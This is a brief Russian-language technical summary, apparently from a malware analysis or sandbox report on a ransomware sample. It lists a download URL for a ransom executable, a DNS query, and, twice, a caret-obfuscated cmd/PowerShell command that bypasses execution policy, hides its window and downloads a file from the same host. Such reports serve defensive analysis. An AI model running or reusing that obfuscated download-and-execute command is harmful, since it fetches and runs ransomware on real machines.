Техническая информация
- http://paket.pw/ransom/traxxio.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^o^WERS^h^e^LL.eXe -EX^e^C^utIONpOLicy^ ^BYPa^S^S -n^Oprof^il^E^ -wIn^D^owSt^yle ^H^idDEn^ (^n^E^w-O^bJ^ect S^YS^Te^M^.NE^T.^w^ebCl^I^En^T^).DOWnlo^A^DFiL^E('http://paket.pw/r...
- DNS ASK pa##t.pw
- '<SYSTEM32>\cmd.exe' /c "p^o^WERS^h^e^LL.eXe -EX^e^C^utIONpOLicy^ ^BYPa^S^S -n^Oprof^il^E^ -wIn^D^owSt^yle ^H^idDEn^ (^n^E^w-O^bJ^ect S^YS^Te^M^.NE^T.^w^ebCl^I^En^T^).DOWnlo^A^DFiL^E('http://paket.pw/r...' (со скрытым окном)